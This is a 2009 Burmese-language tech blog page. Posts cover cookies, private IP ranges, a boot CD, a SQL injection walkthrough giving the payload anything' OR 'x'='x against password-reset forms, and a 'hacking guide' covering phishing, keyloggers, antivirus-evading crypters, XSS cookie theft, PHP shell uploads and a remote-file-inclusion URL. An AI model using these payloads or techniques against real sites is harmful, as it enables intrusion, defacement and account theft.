What is Cookie ???

Tuesday, September 29, 2009 min that thant

Cookie are one of several ways to store data about web site visitors during the time when web server and browser are not connected. Common use of cookies is to remember users between visits. Practically, cookie is a small text file sent by web server and saved by web browser on client machine.
ကွန်ပြူတာကွတ်ကီး ဆိုတာ ကတော့ computer ထဲမှာ သိမ်းထားတဲ့ text file လေးတစ်ခုပါပဲ။ သူ့အထဲမှာ internet website တစ်ခုကို ကြည့်ရှုလိုက်တဲ့သူရဲ့ အချက်အလက်တွေကို သိမ်းထားပါတယ်။ အဲဒီ file ကို website server ကနေပြီး ပြုလုပ်တာဖြစ်ပါတယ်။ ဘာလို့လဲ ဆိုတော့ သူ့ website ကို ကြည့်လိုက်တဲ့ user တစ်ယောက်ချင်းဆီရဲ့ data ကို အဲဒီ user တွေဆီမှာပဲ သိမ်းထားတဲ့ သဘောပါပဲ။ shopping carts တို့မှာဆိုရင် သုံးလေ့ရှိပါတယ် ။ user ရွေးချယ်ထားတဲ့ပစ္စည်း အမျိုးအစားကို အဲဒီ cookie တွေမှာရေးမှတ်ထားပြီး user က buy ခလုတ်ကို နှိပ်လိုက်တော့မှ အဲဒီ data ကို server ဆီကို ပို့ပေးပါတယ်။ နောက်ပြီးတခါတလေ website ရဲ့ color and font preference ကို ရေးမှတ်ထားလေ့ရှိပါတယ် ။နောက် တစ်ချို့ forum တွေရဲ့ ကြည့်ပြီးသား post တွေကို မှတ်တဲ့ နေရာမှာလည်းသုံးလေ့ရှိပါတယ်။ cookie file တွေကို create လုပ်ထားတဲ့ domain website ကသာ ဖတ်နိုင်ပါတယ်။ အောက်က ဥပမာလေးကတော့ php programming နဲ့ ရေးထားတာပါ။ user တစ်ယောက်ဟာ သူ့ website ကို 24 နာရီအတွင်းမှာ ဘယ်နခါ၀င် ကြည့်ခဲ့သလဲ ဆိုတာ ကို track ပါတယ်။

<?php $page_accesses = $_COOKIE['accesses'];
setcookie('accesses', ++$page_accesses, time()+86400);
?>

website visitor တစ်ယောက် က ဒီ cookies ရှိတဲ့ page ကို ကြည့်လိုက်တိုင်းမှာ website ဟာ ဒီ visitor ရဲ့ computer ထဲမှာ သူ့ရဲ့ အရင်က cookie လေးရှိသလားကို အရင်ကြည့်ပါမယ်။ မရှိခဲ့ ရင် website ဟာသူ့ရဲ့ address ရယ်၊ cookie expire date ပါ၀င်တဲ့ short text file လေးတစ်ခုကို create လုပ်ပါမယ်။ cookie အဟောင်း ရှိခဲ့ တယ်ဆိုရင်တော့ delete လုပ်ပြီး new cookie ကို new expire date နဲ့ create လုပ်ပါမယ်။ အခု cookie လေးကတော့ website ကို ၀င်ကြည့်ပြီးနောက် 24 hours , 86400 seconds ခံပါတယ်။ ပြီးရင်တော့ delete လုပ်ခံရမှာဖြစ်ပါတယ်။
Temporary and Persistent Cookies
အပေါ်က ကွတ်ကီးလေးကတော့ persistent cookie ပါ။ သူဟာ expire date ကုန်တဲ့အထိ ဒါမှမဟုတ် visitor က ဖျက်ပစ်လိုက်တဲ့အချိန်အထိ ခံပါတယ်။ Session cookies or Temporary cookies ကတော့ browser ကို ပိတ်လိုက်တာနဲ့ ပျောက်သွားမှာဖြစ်ပါတယ်။ Session cookies ကို သုံးရတာကတော့ visitor ရဲ့ လှုပ်ရှားမှုကို နောက်ယောင်ခံဖို့ နဲ့ user information ကို မှတ်ထားဖို့ အတွက်ဖြစ်ပါတယ်။
ကွတ်ကီးများ စုပုံလာခြင်းအားဖြင့် ကွန်ပြူတာစွမ်းဆောင်ရည် ကျဆင်းလာစေပြီး security ကို လည်း စိုးရိမ်ရပါတယ်။

Posted in , , , ,
Posted by min that thant

SQL Injection Attacks(1)

Sunday, September 27, 2009 min that thant

“SQL Injection” ဆိုတာကတော့ ပုံမှန် user input တွေနေရာမှာ attacker ဟာသူ့ရဲ့ attack SQL code တွေကို အစားထိုးတည့်ပြီး database ဆီကို ပို့လွှတ်လိုက်တာဖြစ်ပါတယ်။ အဲဒီ code တွေကို SQL database မှာ အလုပ်လုပ်စေမှာ ဖြစ်ပါတယ်။ အောက်ဖော်ပြပါ tutorial လေးကတော့ အကောင်းဆုံးမဟုတ်တောင် သဘောတရားအနည်းငယ်ကိုတော့ သိစေမှာပါ။ ဒါကိုသိဖို့ SQL server request code အနည်းငယ်ကို အကျွမ်းတဝင် ရှိဖို့တော့လိုပါလိမ့်မယ်။
The Target Intranet
အခု website တစ်ခုကို ဘာမှ မသိဘဲ hack ကြည့်ပါမယ်။ ဒါကို blind attack လို့ ခေါ်ပါတယ်။ အဲဒီ website ဆက်သွယ်အလုပ်လုပ်နေတဲ့ database ကတော့ SQL server ဖြစ်ရပါမယ်။ server မှာ Microsoft’s IIS 6 နဲ့ ASP.Net ရော Run ထားဖို့လိုပါမယ်။ အခုနည်းလေးကတော့ SQL server နောက်ခံထားတဲ့ ဘယ် website ကိုမဆို စမ်းသပ်နိုင်ပါတယ်။
ပုံမှန် Login page တစ်ခုမှာ username နဲ့ password ကို တောင်းခံတဲ့ form ရှိပါတယ်။ နောက်ပြီးအောက်နားလေးမှာ forget password အတွက် recovery link လေးတစ်ခု ရှိပါတယ်။ အဲဒီကနေ email address ရိုက်ထည့်လိုက်ပြီ ဆိုတာနဲ့ website ဟာ အဲဒီ email address ကို SQL database မှာ သွားကြည့်ပါမယ်။ database မှာတွေ့ရင် password reset request ကိုအဲဒီ mail ဆီ send မှာဖြစ်ပါတယ်။အခုကျွန်တော်တို့ ဟာအဲဒီနေရာမှာ အလုပ် လုပ်မှာ ဖြစ်ပါတယ်။ ကဲ SQL code ကို ဘယ်လို လိမ်ကြမလဲ။


SELECT fieldlist
FROM table
WHERE field = '$EMAIL';

ဒီမှာ $EMAIL ဟာ user မှဖြည့်လိုက်တဲ့ email address ဖြစ်ပါတယ်။ ပုံမှန်အားဖြင့် ဒီလိုပဲ ဖြစ်မှာပါ။ အဲဒီ email address ကို ( ‘ ) နဲ့ပိတ်ထား ရပါမယ်။ အခုဒီမှာ email address မသိပါဘူး။ သဘောတရားကို ဆက်ကြည့်ပါမယ်။ အကယ်လို့ user ကနေ steve@unixwiz.net’ (မှတ်ရန် - ( ‘ ) ပါပါမယ် ) လို့ရိုက်ထည့်လိုက်ရင် ဘယ်လို်ဖြစ်သွားမလဲ။

SELECT fieldlist
FROM table
WHERE field = 'steve@unixwiz.net'';

ဒီလိုရိုက်ထည့်လိုက်ရင် SQL parser ဟာ ( ‘ ) နှစ်ခုတွေ့ပြီးတော့ syntax error ပြပါလိမ့်မယ်။ ဒီမှာ “email address is unknown” ဆိုတယ့် သဘောနဲ့ error တက်လာမယ်ဆိုရင် ဒီ website ဟာ user ထည့်ပေးလိုက်တဲ့ email address ကို SQL server request ရဲ့ WHERE clause မှာ ဖြည့်လိုက်တယ်ဆိုတာ သိရပါမယ်။ အဲဒါဆိုရင်တော့ WHERE field မှာ ပဲ အလုပ်လုပ်ရပါတော့မယ်။
anything’ OR ‘x’=’x လို့ ဖြည့်ကြည့်မယ်ဆိုရင်

SELECT fieldlist
FROM table
WHERE field = 'anything' OR 'x'='x';

ဒီမှာဆိုရင် ရှေ့ဆုံး က ( ‘ ) နဲ့ နောက်ဆုံးက ( ‘ ) တို့ဟာ မူရင်း clause မှာပါပြီးသားဟာ ဖြစ်တယ်ဆိုတာ သတိပြုရပါမယ်။ အဲဒီ clause မှာ ရှေ့က email address ကမှားနေ ပေမယ့်လည်း x=x ကတော့ အမြဲတမ်း မှန်နေမှာ ဖြစ်ပါတယ်။ OR ခံထားတဲ့ အတွက် ဒီ request ဟာ အလုပ်လုပ်သွားပါပြီ။ ဒီမှာ response အနေနဲ့ website ဟာ random user တစ်ယောက်ကို ရွေးပြီး password change နိုင်တဲ့ request mail ကို ပို့လိုက်ပါမယ်။ နောက်ပြီး website page မှာ အဲဒီ user ကို mail ပို့ပြီးကြောင်း ဖော်ပြပါလိမ့်မယ်။

Your login information has been mailed to random.person@example.com.

ဒါဆိုရင် attacker ဟာ ဖြည့်ရမယ့် user name ကို ရရှိသွားပြီဖြစ်ပါတယ်။အဲဒီ random user ကတော့ website ရဲ့ forgotten-password request mail ကို လက်ခံရရှိသွားပါလိမ့်မယ်။ သူ့အတွက်တော့ အံ့အားသင့်စရာ ဖြစ်သွားပါလိမ့်မယ်။ ဒါဟာ သူ့အတွက် သူ့ password hack ခံရတော့မယ့် warning ဖြစ်ကောင်းဖြစ်နိုင်ပါတယ်။အခုကိစ္စမှာ attacker ရဲ့ various inputs များအတွက် server မှတုန့်ပြန်နိုင်သော အခြေအနေ ၃ ခုရှိပါတယ်။
၁။ “Your login information has been mailed to email”
၂။”We don’t recognize your email address”
၃။Server error
အပေါ်က နှစ်ခုသော response ကတော့ well-formed SQL error ဖြစ်ပြီး server ရဲ့ SQL structure query ကိုခန့်မှန်းဖို့ အတွက် အသုံးဝင်ပါတယ်။ နောက်တစ်ခုဆိုရင်တော့ bad SQL error ဖြစ်ပါတယ်။


(ဆက်ရန်)
more info (http://unixwiz.net/techtips/sql-injection.html)

Posted in
Posted by min that thant

A complete Hacking Guide

Sunday, September 27, 2009 min that thant

Introduction
ကျွန်တော်တို့ Website တွေ Forum တွေမှာ တွေ့နေရတာ လူတွေ မေးနေကြတာတွေထဲက အများစုကတော့ အီးမေးလ်တစ်ခုကို ဘယ်လို HACK မလဲ ၊ သူ့ password ကို ဘယ်လိုသိအောင်လုပ်မလဲ ၊website တစ်ခုကို ဘယ်လို attack လုပ်မလဲ ဆိုတာတွေပါ ၊ ဒီ tutorial လေးကတော့ သင့်ကို HACK တစ်ခုရဲ့ အခြေခံသဘောတရားကို နားလည်အောင် အထောက်အကူပြုပါလိမ့်မယ် ၊နောက်ပြီး အဲလို attacker တွေရဲ့ ရန်ကနေ ဘယ်လိုကာကွယ်ရမလဲ ဆိုတာတွေကို ရှင်းပြသွားပါမယ် ။
Background
Hacking ဆိုတာကတော့ ဟိုး Window 98 စကတည်း က ပေါ်ပေါက်လာခဲ့တာပါ။ Hacking ဆိုတာကတော့ အခြေခံအားဖြင့် ကွန်ပြူတာစနစ်ရဲ့ ဂယ်ပေါက်ကို ရှာတာ၊ နောက် information အချက်တစ်ခုရဲ့ အားနည်းချက်ကို ရှာတာ ဖြစ်ပါတယ် ၊ အဲဒီကနေ attacker ဟာ အဲဒီလူရဲ့ Critical information တွေဖြစ်တဲ့ password တို့ credit card detail တွေကို သိအောင်လုပ်သွားတာပါပဲ ၊
Initialization
အရင်ဆုံး Hacking ကို ချုပ်ကြည့်မယ်ဆိုရင် အဓိက နှစ်ပိုင်း ရှိပါတယ်။
၁။ Email or user information
၂။Web based hacking

Email or user information
အခုခေတ်မှာ email password ,credit card information တို့အတွက် အောက်ပါနည်းလမ်းတွေကို အသုံးများပါတယ်။
၁။Phishing
၂။Brute Forcing
၃။Keylogging
၄။Trojans
Phishing(webpage အတုဖြင့်တိုက်ခိုက်ခြင်း)
Phishing ကတော့ အခြေခံအားဖြင့် အများစုကို တိုက်ခိုက်ဖို့ အတွက်သုံးပါတယ် ။ ဒီနည်းနဲ့ တိုက်ခိုက်ဖို့ အတွက် hacker ဟာ Yahoo တို့ Gmail တို့ နဲ့ အပေါ်ယံ သွင်ပြင်ချင်း ဆင်တူတဲ့ website တစ်ခုကို ရေးပါတယ် ပြီးတဲ့ အခါမှာ အဲဒီ အတုအယောင် webpage ကို သူတို့ရဲ့ ကိုယ်ပိုင် server မှာတင်ပါတယ်။ ပြီးရင် အဲဒီ website link ကို user များဆီကို ဖြန့်ပါတယ် ..(Fwd mail နဲ့ ဖြစ်ဖြစ် forum တစ်ခုခုမှာ post တင်ပြီးဖြစ်ဖြစ် ဖြန့်ပါတယ် ) user တွေက အဲဒီ webpage ကို ဖွင့်လိုက်မယ် ၊ user တွေရဲ့စိတ်ထဲ မှာ တကယ့် Gmail Yahoo webpage လို့ ပဲ ထင်နေပြီးတော့ သူတို့ရဲ့ username နဲ့ password ကို ယုံယုံကြည်ကြည်ရိုက်ထည့်လိုက်မယ် ဆိုရင် အဲဒါတွေဟာ attacker တွေဆီကို ရောက်သွားပြီ ဖြစ်ပါတယ်။ ဒီနည်းကတော့ hacking လောကကို ၀င်ဖို့ ကြိုးစားနေတဲ့ သူများ အများဆုံးအသုံးပြုကြတဲ့နည်းဖြစ်ပါတယ်။
မကောင်းကျိုးများ
မကောင်းတာတစ်ခုကတော့ user ဟာ အင်တာနက်အကြောင်းကို အနည်းငယ်မျှသိ ရုံနဲဲ့ phishing attack ကို ရှောင်နိုင်ပါတယ်။ user ဟာ website URL address ကို ကြည့်ရုံနဲ့ ဒီ website ဟာ အစစ်ဟုတ်မဟုတ် သိနိုင်ပါတယ်။
Brute Forcing
Brute Forcer ကတော့ cracker program တစ်ခုပါပဲ ။hack ချင်တဲ့ username ကို ထည့်ပြီး သူ့ရဲ့ password ကိုမှန်အောင် ဖော်ထုတ်တဲ့ နည်းဖြစ်ပါတယ်။ ဒီမှာ hacker ဟာသူဖြစ်နိုင်မယ်ထင်ရတဲ့ password များကို notepad မှာထည့်ပြီး တိုက်ကြည့်တာဖြစ်ပါတယ်။
မကောင်းကျိုးများ
brute attack ဟာတခါတရံမှာ အချိန်တော်တော်ကြာတတ်ပါတယ်။ အောင်မြင် နိုင်တယ်လို့ သေချာပြောလို့ မရပါဘူး ။ နောက်ပြီး အခုခေတ်မှာ user တော်တော်များများဟာ alpha-numeric-symbol တွဲထားတဲ့ password တွေကို သုံးလာတဲ့ အတွက် brutefocer အတွက် hack ဖို့ရာ အတော်ခက်ခဲသွားပါပြီ။ လူသုံးများသော website များဖြစ်တဲ့ Yahoo Google စတဲ့ website များတွင်လည်း brute attack ကို ကာကွယ်ဖို့ login password ၃ ခါမှားလျှင် “image captcha” ဖမ်းပေးရတဲ့ နည်းလမ်းများကို သုံးလာကြပါပြီ။ (image captcha=check the letter in the picture and type them in text box)
Keylogging
Keylogger ဆိုတာ server တစ်ခုကို ဖန်တီးပေးတဲ့ program လေးတစ်ခုပါ။user ဟာ အဲဒီ program လေးကို click လိုက်တာနဲ့ ကိစ္စပြီးသွားပါပြီ ။ဒါကတော့ user တွေကို hack နိုင်ဖို့ အဖြစ်နိုင်ဆုံးနည်း တစ်ခုပါပဲ။ user တွေဟာ Keylogger ကို သူတို့ ကိုယ်တိုင် သူတို့ ရဲ့ computer မှာ install လုပ်ပြီဆိုတာနဲ့ keylogger ဟာ keyboard ကနေ ရိုက်သမျှ စာတွေကို record လုပ်ပြီး hacker ဆီကို တိုက်ရိုက်ပို့ မှာဖြစ်ပါတယ်။ ပို့တဲ့နည်းတွေကတော့ FTP,Email,Messenger စသည်ဖြင့်ရှိပါတယ်။ ကျွန်တော့်အတွက်ကတော့ ဒါဟာ user တွေဆီကနေ information ရယူဖို့ အလွယ်ဆုံးလို့ပြောချင်ပါတယ်။ software မှန်သမျှကို ယုံကြည်ရမှ run ဖို့သင့်ပါတယ်။ ကိုယ့်ဆီက information hack မယ့်သူရဲ့ hacking software ကို ကိုကိုယ်တိုင် install မလုပ်မိဖို့ လိုအပ်ပါတယ်။ freeware shareware ဆိုတိုင်းလဲ ယုံကြည်ရတာမဟုတ်ပါဘူး။
မကောင်းကျိုးများ
အကယ်လို့ user ဟာ အဲဒီ keylogger ကိုလက်ခံမိရင်တောင်မှ antivirus တွေဟာ detect ဖြစ်ပါတယ်။ဒါကြောင့် အဲဒါ install လုပ်ဖို့ user တွေကနေ သူတို့ရဲ့ antivirus ကို disable လုပ်ထားရမှာဖြစ်ပါတယ်။ နောက်ပြီးတခါတရံ မှာ message ပို့တာကို window firewall ရဲ့ block ခြင်းခံရတတ်ပါတယ်။Tips: cypters လို့ ခေါ်တဲ့ program လေးတွေကတော့ attacker ရဲ့ server program လေးတွေကို antivirus တွေကနေ detect မလုပ်နိုင်အောင် ကာကွယ်ပေးနိုင်ပါတယ်။
Trojans
Trojans တွေကတော့ keylogger တွေလိုပါပဲ။ Trojans တွေဟာ keylogger တွေလိုပဲ keyboard logs တွေကို attacker တွေဆီကို send နိုင်ပါတယ်။ နောက်တစ်ခုကတော့ Trojans တွေဟာ attacker တွေကို user ရဲ့ ကွန်ပြူတာကို ထိန်းချုပ်နိုင်အောင် ပြုလုပ်ပေးနိုင်ပါတယ်။တစ်ချို့ဆို user ရဲ့ ကွန်ပြူတာက CDROM တွေကို တောင်အသွင်းအထုတ် ပြုလုပ်နိုင်ပါတယ်။
မကောင်းကျိုးများ
keylogger နဲ့ အတူတူပါပဲ

WEB Hacking
WEB hacking မှာတော့ အများအားဖြင့် ၄ မျိုးရှိပါတယ်။
၁။SQL injection
၂။XSS
၃။Shells
၄။RFI
၅။ နောက်ထပ်အချို့ရှိပါသေးတယ်။ဒါပေမယ့် ရှင်းပြဖို့ အလွန်များပြားပါတယ်။

SQL injection: အခုခေတ် website အများစုဟာသူတို့ဆီကို user တစ်ယောက် register လုပ်လာပြီဆိုရင် သူတို့ရဲ့ username များနဲ့ password များကို (encrypted လုပ်ပြီး ) ထိန်းသိမ်းဖို့အတွက် SQL database ကို အသုံးများပါတယ်။website ဟာ database ဆီကို user login ၀င်တိုင်းမှာ password ကို validate လုပ်ဖို့အတွက် request ပို့ပေးရပါတယ်။ အကယ်လို့ မှန်ရင် website ဟာ user ကို access လုပ်ပေးပြီး မှားခဲ့ရင် error ပေးပါမယ်။ အခြေခံကတော့ အဲဒီပို့လိုက်တဲ့ request မှာ code တွေကို ထည့်သွင်းလိုက်ပြီး database မှာရှိတဲ့ information ကို တခြားတနေရာသို့ ပို့ပေးစေခြင်းဖြစ်ပါတယ်။ အကျယ်တဝင့်ရှင်းပြဖို့ ဒီမှာ မလွယ်ပါဘူး။ အကယ်လို့ ကိုယ့် website ကို hack ခံရ မခံရ ကို စစ်ဖို့
သင့်ရဲ့ website URL ပါ


yoursite.com/index.php?id=545

အဲဒါရဲ့ နောက်ဆုံးမှာ အောက်ပါအတိုင်းဖြည့်လိုက်ပါ

yoursite.com/index.php?id=545’

XSS: XSS ကလည်း website များကို hack တဲ့နေရာမှာ ကောင်းတဲ့ နည်းတစ်ခုပါပဲ။ အကယ်လို့ website /forum တစ်ခုဟာ html post တစ်ခုခု ကို တင်ခွင့်ပြုထားမယ်ဆိုရင် hacker ဟာ script တစ်ခုကို post တင်လိုက်ပါမယ်။ user တစ်ယောက်ဟာ အဲဒီ script webpage ကို ဖွင့်လိုက်ရုံနဲ့ script ဟာ user browser cookies တွေကို hacker ဆီသို့ ပို့ပေးလိုက်မှာဖြစ်ပါတယ်။ ဒီလိုနဲ့ hacker ဟာ အဲဒီ user နာမည်နဲ့ login ၀င်နိုင်တော့မှာ ဖြစ်ပါတယ် ။
Shells: Shell ဆိုတာကတော့ မလိုလားအပ်တဲ့ .php script တွေပါ။ ဒီမှာလုပ်ရမှာက အရင်ဆုံး avatars တို့ recepie တို့ ticks တို့ feedbacks တို့ ကို upload တင်နိုင်တဲ့ website/ forum တို့ကိုအရင်ရှာရပါမယ်။ ပြီးရင် အဲဒီ forum မှာ ကိုယ့်ရဲ့ shell file လေးကို အဲဒီမှာ upload လုပ်ပါမယ်။ ပြီးရင် URL bar ကနေပြီး အဲဒီ file လေးကို open လိုက်တာနဲ့ အဲဒီ website upload လုပ်ထားတဲ့ webhosting ရဲ့ FTP account တစ်ခုလုံးကို မြင်တွေ့ရမှာ ဖြစ်ပါတယ်။ ဒါဆိုရင်တော့ attacker ဟာ အဲဒီ website ရဲ့ index page အပါအဝင် ကြိုက်တာကို edit လုပ်ခွင့်ရရှိသွားမှာ ဖြစ်ပါတယ်။ (deface လို့လည်းခေါ်ပါတယ်)
RFI: RFI (remote file inclusion) ဒီနည်းမှာ attacker ဟာ သူ့ရဲ့ php script code တွေကို သင့်ရဲ့ php application ထဲကို ကြိုးစားပြီးထည့်သွင်းရပါတယ်။ attacker က အောင်မြင်စွာ ထည့်သွင်းနိုင်ပြီဆိုတာနဲ့ attacker ဟာ user ရဲ့ webserver ကို ထိန်းချုပ်ခွင့် ရသွားမှာဖြစ်ပါတယ်။ ဒီမှာ Shell ကို အသုံးပြုပါတယ်။ ဥပမာ attacker ဟာ သူ့ရဲ့ code ကို ဒီမှာ upload ထားပြီ ဆိုပါစို့။

yoursite.com/shell.txt

hack ချင်တဲ့ webpage address မှာ

victimssite.com/index.php?page=yoursite.com/shell.txt

ဒါဆိုရင် user ရဲ့ website FTP server က attacker ကို edit လုပ်ခွင့်ပေးလိုက်ပြီဖြစ်ပါတယ်။
သင့် webpage ကို အဲလိုတိုက်ခိုက်ခံရသလား စစ်ချင်ရင်တော့
သင့် webpage url :

yoursite.com/index.php?id=545

နောက်ဆုံးမှာထပ်ဖြည့်လိုက်ပါ

yoursite.com/index.php?id=http://www.google.com

အကယ်လို့ google page ဟာ သင့် webpage ထဲပါလာရင် သင့် website ဟာတိုက်ခိုက်ခံ နေရပြီလို့ မှတ်လို့ရပါတယ်
more info
http://cyberwarez.info/forum/tutorials-manuals-tricks/545568-complete-hacking-guide.html

Posted in
Posted by min that thant

Private IP Addresses

Thursday, September 17, 2009 min that thant

Private IP Addresses ဆိုတာကတော့ အင်တာနက်ပေါ်မှာ မတွေ့နိုင်တဲ့ LAN ထဲ မှာသာသုံးဖို့ သတ်မှတ်ထားတဲ့ IP addresses တွေဖြစ်ပါတယ်။ Internet Assigned Numbers Authority (IANA) ကနေ အောက်ပါ အုပ်စုသုံးခု ကို LAN (private network) တွေမှာသုံးဖို့ သတ်မှတ်ထားပါတယ် ..


10.0.0.0 - 10.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255 အများစုအသုံးပြုနေပါတယ်
Also, IP addresses in the range of 169.254.0.0 -169.254.255.255 are reserved for Automatic Private IP Addressing.

Posted in
Posted by min that thant

Hiren- BootCD 10.0

Saturday, September 05, 2009 min that thant

ဒီနေ့တော့ မနေ့ကလုပ်ထားတာနဲ့ ဆက်လုပ်ဖြစ်ပါတယ် .. boot CD တစ်ခုကိုဆောင်ထားသင့်တယ်ထင်ပါတယ် .. ဟိုတစ်နေ့က မြန်မာ ဆိုင်ဘာဂျာနယ်မှာ ဖတ်မိပြီးတော့ စိတ်ဝင်စားသွားပါတယ် boot CD တွေရဲ့ အခန်းကိုပါ .. ဟုတ်တယ်ဗျ .. ကိုယ့် ကွန်ပြူတာရဲ့ မူရင်း ၀င်းဒိုးကြီး ဗိုင်းရပ်ဖြစ်ဖြစ် တစ်ခုခုကြောင့် မတက်လာတော့လျှင်ဖြင့် စိတ်ညစ်ရပါတယ် ..၀င်းဒိုးပြန်တင်လိုက်လေ ဆိုပေမယ့် My document နဲ့ Desktop ပေါ်က ဖိုင်တွေကတော့ဖြင့် စွန့်လွတ်ရမှာဖြစ်ပါတယ် .ဒီ CD လေးကတော့ဖြင့် boot တက်လာအောင်ကူညီပေးပါတယ် .. အဲဒီထဲမှာလည်း tools တွေ အစုံအလင်ထည့်ပေးထားပါတယ် .. ရိုးရိုးလေးတော့ စမ်းသပ်ပြီးပါပြီ .. ဟီး အခုလောလောဆယ်က ၀င်းဒိုးက အကောင်းကြီးဆိုတော့ မလိုသေးဘူးပေါ့ ..စမ်းသပ်ရတာလည်း မကောင်းဘူးပေါ့ ..မပြောကောင်းမဆိုကောင်း ၀င်းဒိုးတစ်ခုခုဖြစ်တော့မှ Hiren boot CD ရဲ့ အခန်းကို သိတော့မှာပဲ .. အခုတော့ CD ခုတ်ပြီးပါပြီ ..

Posted in
Posted by min that thant
Subscribe to: Posts (Atom)
Twitter Delicious Facebook Digg Stumbleupon Favorites More
powered by Blogger